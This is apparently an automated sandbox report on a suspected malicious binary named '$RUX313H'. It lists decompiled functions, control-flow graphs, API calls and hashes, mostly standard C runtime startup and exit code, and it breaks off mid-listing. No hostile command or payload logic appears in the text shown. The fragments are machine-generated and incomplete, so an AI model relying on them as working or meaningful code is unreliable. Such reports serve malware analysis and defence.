                                                                          • Opcode ID: f3b6472012121814c1d1e1eb4ba8619a55f6d8af2726c66d05a3f34480e627bb
                                                                          • Instruction ID: 49c260c5a2cbdef08240e31cd928824d80f17254cdbb0a433857b6d5b5182971
                                                                          • Opcode Fuzzy Hash: f3b6472012121814c1d1e1eb4ba8619a55f6d8af2726c66d05a3f34480e627bb
                                                                          • Instruction Fuzzy Hash: D3214878254309AFD604DB60CE49F3A7BA5AB84B04F05C91CBA4997294DAB0E918CA72
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 03428830, Relevance: 1.8, Strings: 1, Instructions: 548COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 154 3428830-3428895 call 3428830 call 3428540 * 2 call 3427c0c 164 342889a-342889d 154->164 165 34288a3-34288a9 164->165 166 342896a-3428974 164->166 167 3428975-34289ec 165->167 168 34288af-34288c1 165->168 184 34289f3-3428a6f 167->184 171 3428933-342895d call 3427c40 168->171 172 34288c3-342892b 168->172 171->184 185 3428963-3428965 171->185 172->171 196 3428b1e-3428b27 184->196 185->164 197 3428b32-3428b39 196->197 198 3428b29-3428b2c 196->198 200 3428cf3-3428cfd 197->200 201 3428b3f-3428b4f call 3428540 197->201 198->197 199 3428a74-3428a80 198->199 203 3428a86-3428a9c 199->203 204 3428cfe-3428d11 199->204 208 3428b51-3428b53 201->208 209 3428b55-3428b5b 201->209 210 3428b10-3428b1b 203->210 211 3428a9e-3428b08 203->211 212 3428d13-3428d46 204->212 213 3428cd8-3428ce1 204->213 214 3428b62-3428bc0 call 3427c0c 208->214 209->214 210->196 211->210 226 3428eb3-3428ebd 212->226 227 3428d4c-3428d6a 212->227 221 3428ce4-3428ced 213->221 214->221 221->200 225 3428bc5-3428c10 221->225 231 3428c32-3428c44 225->231 232 3428c12-3428c14 225->232 236 3428dd2-3428de0 227->236 237 3428d6c-3428dca call 3428540 227->237 243 3428c46-3428cb0 231->243 244 3428cb8-3428cd5 231->244 232->231 234 3428c16-3428c2d 232->234 234->221 236->226 246 3428de6-3428e12 236->246 237->236 243->244 244->213 246->226 258 3428e18-3428e1b 246->258 258->226 259 3428e21-3428e24 258->259 260 3428e2a-3428e3c 259->260 261 3428ebe-3428f0b 259->261 266 3428e3e-3428e97 260->266 267 3428e9f-3428ead 260->267 266->267 267->226 267->246
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: m
                                                                          • API String ID: 0-3775001192
                                                                          • Opcode ID: b6f12c9bbba153c5544c870d7077fe7f8d816adc5e4b05a67b73591db8c0b64c
                                                                          • Instruction ID: bd2f3ffcd72c18f7c059059a2ac07484141d55f47cb375e5af8035356d72cd1b
                                                                          • Opcode Fuzzy Hash: b6f12c9bbba153c5544c870d7077fe7f8d816adc5e4b05a67b73591db8c0b64c
                                                                          • Instruction Fuzzy Hash: F022BF70A006158FCB14DF69C484AAEFBF2FF88314B608A69E515EB791DB34ED45CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342E018, Relevance: .6, Instructions: 589COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a7c54d3a73679fb1897da648c733650eee143a2f9898888ca46afa0ab5170dd8
                                                                          • Instruction ID: 5fd07ab66c4236d85bd9622407c8cb8b008e416f490a245e57538ecdf1b0c7de
                                                                          • Opcode Fuzzy Hash: a7c54d3a73679fb1897da648c733650eee143a2f9898888ca46afa0ab5170dd8
                                                                          • Instruction Fuzzy Hash: 3F322775A002149FCB14DF69C884EAABBF2FF88310F55855AE915AF365D730EC81CBA4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF124B, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 89COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 90%
                                                                          			_entry_(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t17;
				void* _t18;
				void* _t19;
				intOrPtr _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;
				intOrPtr _t28;
				signed int _t39;
				void* _t49;
				signed int _t52;
				void* _t54;
				void* _t56;

				_t50 = __edi;
				_t49 = __edx;
				E00DF24D8();
				_push(0x14);
				_push(0xdfd6e0);
				E00DF2A00(__ebx, __edi, __esi);
				_t52 = E00DF26BB() & 0x0000ffff;
				E00DF248B(2);
				_t56 =  *0xdf0000 - 0x5a4d; // 0x5a4d
				if(_t56 == 0) {
					_t17 =  *0xdf003c; // 0xe8
					__eflags =  *((intOrPtr*)(_t17 + 0xdf0000)) - 0x4550;
					if( *((intOrPtr*)(_t17 + 0xdf0000)) != 0x4550) {
						goto L2;
					} else {
						__eflags =  *((intOrPtr*)(_t17 + 0xdf0018)) - 0x10b;
						if( *((intOrPtr*)(_t17 + 0xdf0018)) != 0x10b) {
							goto L2;
						} else {
							_t39 = 0;
							__eflags =  *((intOrPtr*)(_t17 + 0xdf0074)) - 0xe;
							if( *((intOrPtr*)(_t17 + 0xdf0074)) > 0xe) {
								__eflags =  *(_t17 + 0xdf00e8);
								_t6 =  *(_t17 + 0xdf00e8) != 0;
								__eflags = _t6;
								_t39 = 0 | _t6;
							}
						}
					}
				} else {
					L2:
					_t39 = 0;
				}
				 *(_t54 - 0x1c) = _t39;
				_t18 = E00DF1EBA();
				_t57 = _t18;
				if(_t18 == 0) {
					E00DF13A5(0x1c);
				}
				_t19 = E00DF191D(_t39, _t50, _t57);
				_t58 = _t19;
				if(_t19 == 0) {
					_t19 = E00DF13A5(0x10);
				}
				E00DF2572(_t19);
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				if(E00DF1ECF(_t39, _t50, _t52, _t58) < 0) {
					E00DF13A5(0x1b);
				}
				 *0xe01c90 = GetCommandLineA(); // executed
				_t23 = E00DF25B2(); // executed
				 *0xdffe00 = _t23;
				_t24 = E00DF217D();
				_t60 = _t24;
				if(_t24 < 0) {
					E00DF19F8(_t39, _t49, _t50, _t52, _t60, 8);
				}
				_t25 = E00DF23AA(_t39, _t49, _t50, _t52);
				_t61 = _t25;
				if(_t25 < 0) {
					E00DF19F8(_t39, _t49, _t50, _t52, _t61, 9);
				}
				_t26 = E00DF1A32(_t50, _t52, 1);
				_t62 = _t26;
				if(_t26 != 0) {
					E00DF19F8(_t39, _t49, _t50, _t52, _t62, _t26);
				}
				_t27 = E00DF2992();
				_push(_t52);
				_push(_t27);
				_push(0);
				_t28 = E00DF1140(0xdf0000); // executed
				_t53 = _t28;
				 *((intOrPtr*)(_t54 - 0x24)) = _t28;
				if(_t39 == 0) {
					E00DF1C8E(_t53); // executed
				}
				E00DF1A23();
				 *(_t54 - 4) = 0xfffffffe;
				return E00DF2A45(_t53);
			}

















                                                                          0x00df124b
                                                                          0x00df124b
                                                                          0x00df124b
                                                                          0x00df1255
                                                                          0x00df1257
                                                                          0x00df125c
                                                                          0x00df1266
                                                                          0x00df126b
                                                                          0x00df1276
                                                                          0x00df127d
                                                                          0x00df1283
                                                                          0x00df1288
                                                                          0x00df1292
                                                                          0x00000000
                                                                          0x00df1294
                                                                          0x00df1299
                                                                          0x00df12a0
                                                                          0x00000000
                                                                          0x00df12a2
                                                                          0x00df12a2
                                                                          0x00df12a4
                                                                          0x00df12ab
                                                                          0x00df12ad
                                                                          0x00df12b3
                                                                          0x00df12b3
                                                                          0x00df12b3
                                                                          0x00df12b3
                                                                          0x00df12ab
                                                                          0x00df12a0
                                                                          0x00df127f
                                                                          0x00df127f
                                                                          0x00df127f
                                                                          0x00df127f
                                                                          0x00df12b6
                                                                          0x00df12b9
                                                                          0x00df12be
                                                                          0x00df12c0
                                                                          0x00df12c4
                                                                          0x00df12c9
                                                                          0x00df12ca
                                                                          0x00df12cf
                                                                          0x00df12d1
                                                                          0x00df12d5
                                                                          0x00df12da
                                                                          0x00df12db
                                                                          0x00df12e0
                                                                          0x00df12eb
                                                                          0x00df12ef
                                                                          0x00df12f4
                                                                          0x00df12fb
                                                                          0x00df1300
                                                                          0x00df1305
                                                                          0x00df130a
                                                                          0x00df130f
                                                                          0x00df1311
                                                                          0x00df1315
                                                                          0x00df131a
                                                                          0x00df131b
                                                                          0x00df1320
                                                                          0x00df1322
                                                                          0x00df1326
                                                                          0x00df132b
                                                                          0x00df132e
                                                                          0x00df1334
                                                                          0x00df1336
                                                                          0x00df1339
                                                                          0x00df133e
                                                                          0x00df133f
                                                                          0x00df1344
                                                                          0x00df1345
                                                                          0x00df1346
                                                                          0x00df134d
                                                                          0x00df1352
                                                                          0x00df1354
                                                                          0x00df1359
                                                                          0x00df135c
                                                                          0x00df135c
                                                                          0x00df1361
                                                                          0x00df1396
                                                                          0x00df13a4

                                                                          APIs
                                                                          • ___security_init_cookie.LIBCMT ref: 00DF124B
                                                                            • Part of subcall function 00DF26BB: GetStartupInfoW.KERNEL32(?), ref: 00DF26C5
                                                                          • _fast_error_exit.LIBCMT ref: 00DF12C4
                                                                          • _fast_error_exit.LIBCMT ref: 00DF12D5
                                                                          • __RTC_Initialize.LIBCMT ref: 00DF12DB
                                                                          • _fast_error_exit.LIBCMT ref: 00DF12EF
                                                                          • GetCommandLineA.KERNEL32(00DFD6E0,00000014), ref: 00DF12F5
                                                                          • ___crtGetEnvironmentStringsA.LIBCMT ref: 00DF1300
                                                                          • __setargv.LIBCMT ref: 00DF130A
                                                                          • __setenvp.LIBCMT ref: 00DF131B
                                                                          • __cinit.LIBCMT ref: 00DF132E
                                                                          • __wincmdln.LIBCMT ref: 00DF133F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: _fast_error_exit$CommandEnvironmentInfoInitializeLineStartupStrings___crt___security_init_cookie__cinit__setargv__setenvp__wincmdln
                                                                          • String ID: .$
                                                                          • API String ID: 2757020214-2223841709
                                                                          • Opcode ID: a7d9564194a40788b562f9f997c708efb676a7d1020318bb432e85e442ff2449
                                                                          • Instruction ID: 9f0e9058337f02f3d33e8cb26775e1f669d82cd08db384b17378e0858810bdf7
                                                                          • Opcode Fuzzy Hash: a7d9564194a40788b562f9f997c708efb676a7d1020318bb432e85e442ff2449
                                                                          • Instruction Fuzzy Hash: 0421D328A4031CD9EB20B7F09847B3D22A4DF20754F17C569FB14DA1D3EEB4C4809A75
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF19B0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 91 df19b0-df19c7 GetModuleHandleExW 92 df19c9-df19d9 GetProcAddress 91->92 93 df19e0-df19e1 91->93 92->93 94 df19db-df19de CorExitProcess 92->94 94->93
                                                                          C-Code - Quality: 16%
                                                                          			E00DF19B0(void* __ecx, intOrPtr _a4) {
				struct HINSTANCE__* _v8;
				_Unknown_base(*)()* _t4;
				void* _t5;

				_t4 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
				if(_t4 != 0) {
					_t4 = GetProcAddress(_v8, "CorExitProcess");
					if(_t4 != 0) {
						_t5 =  *_t4(_a4); // executed
						return _t5;
					}
				}
				return _t4;
			}






                                                                          0x00df19b4
                                                                          0x00df19bf
                                                                          0x00df19c7
                                                                          0x00df19d1
                                                                          0x00df19d9
                                                                          0x00df19de
                                                                          0x00000000
                                                                          0x00df19de
                                                                          0x00df19d9
                                                                          0x00df19e1

                                                                          APIs
                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000001,?,?,00DF19ED,00000000,?,00DF4933,000000FF,0000001E,00000000,00000000,00000000,?,00DF2E9E), ref: 00DF19BF
                                                                          • GetProcAddress.KERNEL32(00000001,CorExitProcess), ref: 00DF19D1
                                                                          • CorExitProcess.MSCOREE(00000000,?,?,00DF19ED,00000000,?,00DF4933,000000FF,0000001E,00000000,00000000,00000000,?,00DF2E9E,00000000,00000000), ref: 00DF19DE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExitHandleModuleProcProcess
                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                          • API String ID: 75539706-1276376045
                                                                          • Opcode ID: e93691948fe2a410687eefb6178928678c2ce9436185d16d5ea66af637dfca78
                                                                          • Instruction ID: b828905feaefdf0d94751319351059e6e09cf9af86eb25c3100a94aa22606010
                                                                          • Opcode Fuzzy Hash: e93691948fe2a410687eefb6178928678c2ce9436185d16d5ea66af637dfca78
                                                                          • Instruction Fuzzy Hash: 69D0123474430CBBDB015B91CD17FB97B6CAB00784F098010BA15E0090DBA1DF44EAB4
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF4906, Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 95 df4906-df4910 96 df4912-df4913 95->96 97 df4981-df4993 call df3eba call df3bbe 95->97 99 df4914-df491b 96->99 112 df4995-df4997 97->112 101 df491d-df4939 call df1ca2 call df1cff call df19e2 99->101 102 df493a-df493c 99->102 101->102 103 df493e-df4940 102->103 104 df4942-df4944 102->104 107 df4945-df4953 RtlAllocateHeap 103->107 104->107 110 df497b-df497f 107->110 111 df4955-df495e 107->111 110->112 114 df496d-df4972 call df3bbe 111->114 115 df4960-df4969 call df3eba 111->115 124 df4974-df4979 call df3bbe 114->124 115->99 123 df496b 115->123 123->124 124->110
                                                                          C-Code - Quality: 93%
                                                                          			E00DF4906(intOrPtr __ebx, void* __edx, void* __edi, long _a4) {
				void* __esi;
				void* __ebp;
				void* _t2;
				void* _t6;
				void* _t7;
				void* _t11;
				long _t18;
				void* _t22;
				long _t25;

				_t23 = __edi;
				_t22 = __edx;
				_t14 = __ebx;
				_t25 = _a4;
				if(_t25 > 0xffffffe0) {
					E00DF3EBA(_t2, _t25);
					 *((intOrPtr*)(E00DF3BBE(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				_push(__ebx);
				_push(__edi);
				while(1) {
					_t6 =  *0xe00790; // 0x17c0000
					_t27 = _t6;
					if(_t6 == 0) {
						E00DF1CA2(_t14, _t22, _t23, _t25, _t27);
						E00DF1CFF(_t14, _t22, _t23, _t25, 0x1e);
						E00DF19E2(0xff);
						_t6 =  *0xe00790; // 0x17c0000
					}
					if(_t25 == 0) {
						_t18 = 1;
						__eflags = 1;
					} else {
						_t18 = _t25;
					}
					_t7 = RtlAllocateHeap(_t6, 0, _t18); // executed
					_t23 = _t7;
					if(_t23 != 0) {
						break;
					}
					_t14 = 0xc;
					if( *0xe00b68 == _t7) {
						 *((intOrPtr*)(E00DF3BBE(__eflags))) = _t14;
						L12:
						 *((intOrPtr*)(E00DF3BBE(_t31))) = _t14;
						break;
					}
					_t11 = E00DF3EBA(_t7, _t25);
					_t31 = _t11;
					if(_t11 != 0) {
						continue;
					}
					goto L12;
				}
				return _t23;
			}












                                                                          0x00df4906
                                                                          0x00df4906
                                                                          0x00df4906
                                                                          0x00df490a
                                                                          0x00df4910
                                                                          0x00df4982
                                                                          0x00df498d
                                                                          0x00df4993
                                                                          0x00000000
                                                                          0x00df4993
                                                                          0x00df4912
                                                                          0x00df4913
                                                                          0x00df4914
                                                                          0x00df4914
                                                                          0x00df4919
                                                                          0x00df491b
                                                                          0x00df491d
                                                                          0x00df4924
                                                                          0x00df492e
                                                                          0x00df4933
                                                                          0x00df4939
                                                                          0x00df493c
                                                                          0x00df4944
                                                                          0x00df4944
                                                                          0x00df493e
                                                                          0x00df493e
                                                                          0x00df493e
                                                                          0x00df4949
                                                                          0x00df494f
                                                                          0x00df4953
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df4957
                                                                          0x00df495e
                                                                          0x00df4972
                                                                          0x00df4974
                                                                          0x00df4979
                                                                          0x00000000
                                                                          0x00df4979
                                                                          0x00df4961
                                                                          0x00df4967
                                                                          0x00df4969
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00df496b
                                                                          0x00000000

                                                                          APIs
                                                                          • __FF_MSGBANNER.LIBCMT ref: 00DF491D
                                                                            • Part of subcall function 00DF1CA2: __NMSG_WRITE.LIBCMT ref: 00DF1CC9
                                                                            • Part of subcall function 00DF1CA2: __NMSG_WRITE.LIBCMT ref: 00DF1CD3
                                                                          • __NMSG_WRITE.LIBCMT ref: 00DF4924
                                                                            • Part of subcall function 00DF1CFF: GetModuleFileNameW.KERNEL32(00000000,00E0019A,00000104,00000000,00000000,00000000), ref: 00DF1D91
                                                                            • Part of subcall function 00DF1CFF: ___crtMessageBoxW.LIBCMT ref: 00DF1E3F
                                                                            • Part of subcall function 00DF19E2: ExitProcess.KERNEL32 ref: 00DF19F1
                                                                            • Part of subcall function 00DF3BBE: __getptd_noexit.LIBCMT ref: 00DF3BBE
                                                                          • RtlAllocateHeap.NTDLL(017C0000,00000000,00000001,00000000,00000000,00000000,?,00DF2E9E,00000000,00000000,00000000,00000000,?,00DF2D56,00000018,00DFD7D0), ref: 00DF4949
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: AllocateExitFileHeapMessageModuleNameProcess___crt__getptd_noexit
                                                                          • String ID:
                                                                          • API String ID: 3823847927-0
                                                                          • Opcode ID: 6a1eaaac66dc3962ad66a9cb330b5b83937cc82ba84bc74791caf5e3f7b0a4ac
                                                                          • Instruction ID: f2f2cc439df1ac293a8bf3f7b3e70977ac5bce922d07838113ec86f530cea9ca
                                                                          • Opcode Fuzzy Hash: 6a1eaaac66dc3962ad66a9cb330b5b83937cc82ba84bc74791caf5e3f7b0a4ac
                                                                          • Instruction Fuzzy Hash: 0401F5363402199EE6112B26EC52B3B7348EF41764F1BC12EFB499B291DEB49D408AB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 05CA5348, Relevance: 2.6, Strings: 2, Instructions: 89COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 127 5ca5348-5ca5369 128 5ca537a-5ca537e 127->128 129 5ca536b-5ca5377 127->129 130 5ca538d-5ca53a9 128->130 131 5ca5380-5ca538a 128->131 135 5ca53af 130->135 136 5ca5446-5ca5459 130->136 131->130 152 5ca53b2 call 5ca55f0 135->152 153 5ca53b2 call 5ca5990 135->153 137 5ca545b-5ca545f 136->137 138 5ca546a 137->138 139 5ca5461 137->139 139->138 140 5ca53b8-5ca53ba 141 5ca53c9-5ca53e1 140->141 142 5ca53bc-5ca53c7 140->142 141->137 142->141 144 5ca53e3-5ca5420 142->144 150 5ca543c-5ca5440 144->150 151 5ca5422-5ca543a 144->151 150->135 150->136 151->137 152->140 153->140
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.683429465.0000000005CA0000.00000040.00000001.sdmp, Offset: 05CA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_5ca0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: \l$\l
                                                                          • API String ID: 0-449874781
                                                                          • Opcode ID: 2c054323bcbda41f064b068861053fb142446a5045a74efb532fe44b123b4e19
                                                                          • Instruction ID: 386406eb8da1d09b1a41c3bfb682683476b1b138e3be8784d202298afa925727
                                                                          • Opcode Fuzzy Hash: 2c054323bcbda41f064b068861053fb142446a5045a74efb532fe44b123b4e19
                                                                          • Instruction Fuzzy Hash: E9317C32A0420ACBDF24DF65E4987EEBFB2EF88319F14C829D416A7280DB705945DB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0342C1E8, Relevance: 1.7, Strings: 1, Instructions: 405COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 279 342c1e8-342c232 call 3429fb0 call 342bca0 286 342c234-342c24a 279->286 287 342c279 279->287 290 342c253-342c277 286->290 291 342c24c 286->291 405 342c27e call 342c720 287->405 406 342c27e call 342c711 287->406 407 342c27e call 342c1e8 287->407 408 342c27e call 342c1cf 287->408 288 342c284-342c296 294 342c2cb-342c310 288->294 295 342c298-342c2ad 288->295 290->287 291->290 303 342c6f0-342c73c 294->303 304 342c316-342c325 294->304 403 342c2b0 call 342cea0 295->403 404 342c2b0 call 342ce91 295->404 298 342c2b2-342c2bb call 342f1a0 300 342c2c1-342c2c8 298->300 319 342c748-342c775 303->319 320 342c73e 303->320 307 342c433-342c471 304->307 308 342c32b-342c33a 304->308 336 342c6ed-342c6ef 307->336 312 342c340-342c34f 308->312 313 342c476-342c53e 308->313 322 342c543-342c5dd 312->322 323 342c355-342c364 312->323 313->336 320->319 322->336 330 342c5e2-342c637 323->330 331 342c36a-342c379 323->331 330->336 340 342c37f-342c38e 331->340 341 342c63c-342c6eb 331->341 340->303 351 342c394-342c42e 340->351 341->336 351->336 403->298 404->298 405->288 406->288 407->288 408->288
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.675351918.0000000003420000.00000040.00000001.sdmp, Offset: 03420000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_3420000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: c"
                                                                          • API String ID: 0-2139221276
                                                                          • Opcode ID: 48ce6cd3c228288ee9c59b171ff4b93c461f905bf528183f9221b31f0ea905e9
                                                                          • Instruction ID: c55b6729b60a778b88af127990d20525b937c8c80b5bc4bef57858f69c36d07d
                                                                          • Opcode Fuzzy Hash: 48ce6cd3c228288ee9c59b171ff4b93c461f905bf528183f9221b31f0ea905e9
                                                                          • Instruction Fuzzy Hash: 72C18C78B04DB90BC718E6B8D46173F61AF9BC8548F23406D960FDB794DF24AD0293A6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF1C8E, Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 410 df1c8e-df1c98 call df1b5f 412 df1c9d-df1ca1 410->412
                                                                          C-Code - Quality: 25%
                                                                          			E00DF1C8E(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E00DF1B5F(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}









                                                                          0x00df1c91
                                                                          0x00df1c93
                                                                          0x00df1c95
                                                                          0x00df1c98
                                                                          0x00df1ca1

                                                                          APIs
                                                                          • _doexit.LIBCMT ref: 00DF1C98
                                                                            • Part of subcall function 00DF1B5F: __lock.LIBCMT ref: 00DF1B6D
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(00DFD750,0000001C,00DF1AD2,00000000,00000001,00000000,?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BAC
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BBD
                                                                            • Part of subcall function 00DF1B5F: EncodePointer.KERNEL32(00000000,?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BD6
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(-00000004,?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BE6
                                                                            • Part of subcall function 00DF1B5F: EncodePointer.KERNEL32(00000000,?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1BEC
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1C02
                                                                            • Part of subcall function 00DF1B5F: DecodePointer.KERNEL32(?,00DF1A13,000000FF,?,00DF2CB0,00000011,00000000,?,00DF18B3,0000000D), ref: 00DF1C0D
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.673570291.0000000000DF1000.00000020.00020000.sdmp, Offset: 00DF0000, based on PE: true
                                                                          • Associated: 00000001.00000002.673560727.0000000000DF0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673582241.0000000000DF9000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673590127.0000000000DFF000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.673598627.0000000000E02000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000001.00000002.674055558.0000000001162000.00000002.00020000.sdmp Download File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_df0000_$RUX313H.jbxd
                                                                          Similarity
                                                                          • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                          • String ID:
                                                                          • API String ID: 2158581194-0
                                                                          • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                          • Instruction ID: 7684081a6e1fdb333da0382bd4408d1a56255990ff57e89f719006e3bc45f232
                                                                          • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                          • Instruction Fuzzy Hash: 9AB0123158030CB3DA102641FC03F157B0D8751B51F114020FB0C2D1E2B993756040E9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00DF19E2, Relevance: 1.5, APIs: 1, Instructions: 7COMMONLIBRARYCODE
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 413 df19e2-df19e8 call df19b0 415 df19ed-df19f1 ExitProcess 413->415
                                                                          C-Code - Quality: 100%
                                                                          			E00DF19E2(int _a4) {
				void* _t4;

				E00DF19B0(_t4, _a4); // executed
				ExitProcess(_a4);
			}




                                                                          0x00df19e8
                                                                          0x00df19f1

                                                                          APIs
                                                                            • Part of subcall function 00DF19B0: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000001,?,?,00DF19ED,00000000,?,00DF4933,000000FF,0000001E,00000000,00000000,00000000,?,00DF2E9E), ref: 00DF19BF
